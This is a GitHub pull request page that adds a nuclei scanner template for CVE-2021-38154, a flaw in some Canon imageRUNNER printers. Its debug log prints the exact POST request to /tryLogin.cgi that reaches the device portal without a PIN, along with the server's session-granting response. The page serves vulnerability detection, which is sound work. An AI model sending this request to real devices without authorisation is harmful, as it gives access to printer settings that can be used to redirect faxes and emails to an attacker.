Skip to content

Add CVE-2021-38154 (vKEV) #13545

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
merged 1 commit into from
Oct 11, 2025
Merged

Add CVE-2021-38154 (vKEV) #13545

merged 1 commit into from
Oct 11, 2025
+61 −0

Conversation

@daffainfo
Copy link
Contributor

@daffainfo daffainfo commented Oct 10, 2025

Template / PR Information

Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is enabled for HTTP access, allow remote attackers to modify an e-mail address setting, and thus cause the device to send sensitive information through e-mail to the attacker. For example, an incoming FAX may be sent through e-mail to the attacker. This occurs when a PIN is not required for General User Mode, as exploited in the wild in August 2021.

Template Validation

I've validated this template locally?

  • YES
  • NO

Debug


                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2021-38154] Dumped HTTP request for http://REDACTED/tryLogin.cgi

POST /tryLogin.cgi HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
Connection: close
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

loginM=&0000=0011&0002=
[DBG] [CVE-2021-38154] Dumped HTTP response http://REDACTED/tryLogin.cgi

HTTP/1.1 303 See Other
Content-Length: 92
Content-Type: text/html
Content-Type: text/html
Location: http://REDACTED/portal_top.html
Set-Cookie: fusion-http-session-id=YPQJCVKPMJQBOXCTQHIT;Comment=;Version=;HttpOnly

<html><body><p>You should be redirected to the new location automatically.</p></body></html>
[CVE-2021-38154:dsl-1] [http] [high] http://REDACTED/tryLogin.cgi
[INF] Scan completed in 683.711834ms. 1 matches found.

@daffainfo
Copy link
Contributor Author

daffainfo commented Oct 10, 2025

Reopen #13510

@DhiyaneshGeek DhiyaneshGeek added the Done Ready to merge label Oct 10, 2025
@github-actions github-actions bot requested a review from pussycat0x October 10, 2025 10:54
@pussycat0x pussycat0x merged commit 61e4bcf into projectdiscovery:main Oct 11, 2025
4 checks passed
@algora-pbc
Copy link

algora-pbc bot commented Oct 11, 2025

🎉🎈 @daffainfo has been awarded $200 by ProjectDiscovery! 🎈🎊

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@pussycat0x pussycat0x pussycat0x approved these changes

Assignees

@DhiyaneshGeek DhiyaneshGeek

Labels

Done Ready to merge Hacktoberfest 💰 Rewarded

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

4 participants

@daffainfo @pussycat0x @DhiyaneshGeek @Akokonunes